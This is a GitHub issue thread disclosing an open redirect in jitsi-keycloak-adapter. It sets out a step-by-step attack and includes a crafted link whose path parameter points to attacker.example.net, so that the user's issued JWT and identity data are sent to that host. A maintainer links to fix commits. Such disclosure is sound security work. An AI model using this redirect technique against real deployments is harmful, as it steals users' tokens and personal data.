### ISSUE TITLE
jitsi-keycloak-adapter acts as an open redirect, allowing for JWT theft

### ISSUE THREAD

**Issue by micolous** [nordeck/jitsi-keycloak-adapter#22]
**Describe the bug**

It appears [`oidc-adapter.html` acts as an open redirect](https://github.com/nordeck/jitsi-keycloak-adapter/blob/037799fd8322270b2d1cd6a0a6673ee3d3c62ac1/templates/usr/share/jitsi-meet/static/oidc-adapter.html#L34-L57), as it seems to allow any value to appear in the `path` query parameter.

This parameter is normally set in a redirect by [`oidc-redirect.html`](https://github.com/nordeck/jitsi-keycloak-adapter/blob/037799fd8322270b2d1cd6a0a6673ee3d3c62ac1/templates/usr/share/jitsi-meet/static/oidc-redirect.html#L7).

In a targetted attack, a malicious website could use this to redirect users to a legitimate `jitsi-keycloak-adapter` instance with a `path` query parameter pointing to a server under their control.

`jitsi-keycloak-adapter` would then perform a completely normal and legitimate OIDC flow with keycloak, and then redirect back out to the attacker's website with a valid JWT as a query parameter.

This JWT:

* contains user identity information (`context` field) – leaking PII
* allows access to any authorised Jitsi instance protected by that `jitsi-keycloak-adapter` instance in *any* room for up to `JWT_EXP_SECOND` seconds (default: 1 hour), because `jitsi-keycloak-adapter` also does not limit the scope of any tokens it issues: #21 

**Steps To Reproduce**

**Note:** this is from static analysis, because I haven't gotten Jitsi running yet.

1. Attacker sends users a link to `https://jitsi.example.com/oidc/auth?path=https%3A//attacker.example.net/fakecall`

   This simulates [`oidc-redirect.html`](https://github.com/nordeck/jitsi-keycloak-adapter/blob/main/templates/usr/share/jitsi-meet/static/oidc-redirect.html).

2. User opens the link.

3. Legitimate `jitsi-keycloak-adapter` redirects the request to Keycloak, with a `redirect_uri` via itself and that `path` query parameter pointing to the attacker's service.

4. User is authenticated with legitimate Keycloak (this may also happen automatically, if they have an open seession)

5. Keycloak redirects back to `/static/oidc-adapter.html` with any query parameters still set.

6. `oidc-adapter.html` makes a `fetch()` request to `/oidc/tokenize` to get a JWT from `jitsi-keycloak-adapter`.

7. `jitsi-keycloak-adapter` makes a UserInfo request to Keycloak to get user information, generate a JWT, and return it to the client as a JSON-encoded string.

8. `oidc-adapter.html` redirects the browser to the `path` query parameter (`https://attacker.example.net/fakecall`) with the JWT passed in the `jwt` query parameter.

9. Attacker now has user info and a JWT to use with Jitsi.

An attacker could then redirect the user to an *actual* Jitsi call with their JWT in tact, and the user will be none the wiser.

**Expected behavior**

It should not be possible to steal JWTs 😉

**Comment by dutty5** [comment]
This adapter actually only partly works with recent versions of Jitsi. Since early summer 2024, after one of the regular apt updates of Jitsi on Debian, it actually stopped redirecting unauthorized users to the IDP for login. However, if a user already has an active authorized session with his IDP prior to visiting Jitsi meet, then that authorization also works for Jitsi.

In general, I always felt that eather Jitsi or this particular adapter authorization logic is somewhat fragile 😊

**Comment by emrahcom** [comment]
@micolous, thank you so much for detailed analyze.

I think it is fixed now:
https://github.com/nordeck/jitsi-keycloak-adapter/commit/d8b694507712135954cf42339af2824cab21bda6
https://github.com/nordeck/jitsi-keycloak-adapter/commit/61a78175ac154bcb4f523f7bdd6e4c151ba4fe3b
https://github.com/nordeck/jitsi-keycloak-adapter/commit/261a88676ec0e072a6a366562498f142c392f4db
